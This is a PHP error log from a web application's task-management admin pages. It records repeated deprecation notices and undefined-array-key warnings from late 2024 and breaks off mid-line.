[28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:27:54 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [28-Nov-2024 22:29:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [02-Dec-2024 10:51:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:28:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:28:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [02-Dec-2024 15:28:51 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [02-Dec-2024 15:30:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 15:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [02-Dec-2024 15:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [02-Dec-2024 15:30:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [02-Dec-2024 15:30:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [02-Dec-2024 15:39:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:05:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:07:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:08:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:30:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [02-Dec-2024 17:30:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:18:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [03-Dec-2024 19:19:20 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [03-Dec-2024 19:20:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [03-Dec-2024 19:20:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [03-Dec-2024 19:34:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [03-Dec-2024 19:34:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 15:38:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 18:22:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 18:22:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 21:30:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Dec-2024 22:01:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:01:50 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:01:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:02:05 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:02:06 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 22:03:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 